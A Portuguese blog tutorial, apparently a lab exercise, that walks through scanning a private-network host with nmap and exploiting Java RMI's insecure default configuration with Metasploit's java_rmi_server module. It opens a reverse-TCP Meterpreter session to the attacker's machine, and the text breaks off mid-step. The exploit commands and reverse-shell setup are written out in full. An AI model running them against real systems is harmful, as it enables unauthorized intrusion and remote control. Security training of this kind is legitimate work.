Vulnerabilidades listada como "INFO" não são necessariamente vulnerabilidades, mas podem também ser aproveitadas se souber o que procurar. Por exemplo, a INFO "RMI Registry Detection". RMI Registry é usado pelo Java, então, vamos ver o que podemos fazer:
Da mesma forma que o post anterior, podemos ver detalhes do servidor e porta:
Mas só porque temos a porta do RMI, não quer dizer que a porta listada esteja vulneravel, mas podemos explorar para ver se achamos uma outras portas abertas por causa de uma falha de um programador, por exemplo. Vamos fazer isso com o seguinte comando:
nmap -sV -sS 10.0.2.4 -p1-65535
isso permitirá ver se tem portas abertas. Provavelmente, não irá encontrar nada, mas então, vamos pedir uma ajudinha para uma outra ferramenta.
Em um outro terminal, vamos rodar o Metaspoitable Framework, com o comando
msfconsole
e depois de iniciado. digitamos
search java_rmi
Aqui podemos ver duas vulnerabilidades:
Destaquei na imagem a vulnerabilidade que escolhi atacar: a configuração padrão inseguro. Vamos nos aprofundar neste item usando o comando
use exploit/multi/misc/java_rmi_server
o Metaspoitable vai explicar que a configuração padrão quando não existe um Payload configurado é ir direto para java/meterpreter/reverse_tcp. Vamos ver os payloads padrões usando o comando
show payloads
Agora, vamos setar o payload do MSF para payload/java/meterpreter/reverse_tcp
set payload payload/java/meterpreter/reverse_tcp
e agora vamos mostrar os parâmetros que podemos usar:
show options
Agora alteraremos o parâmetro RHOST com o IP da máquina alvo:
set RHOST 10.0.2.4
e vamos setar o parâmetro SRVHOST com o IP do Kali (o que estamos usando):
set SRVHOST 10.0.2.15
e também vamos setar o LHOST para a nossa máquina:
set LHOST 10.0.2.15
e agora finalmente, vamos rodar o exploit com o comando:
exploit
Com isso, conseguimos uma sessão Meterpreter aberta;
se eu enviar um sysinfo, vamos obter informações do sistema.
e se enviar o seguinte comando:
Nenhum comentário:
Postar um comentário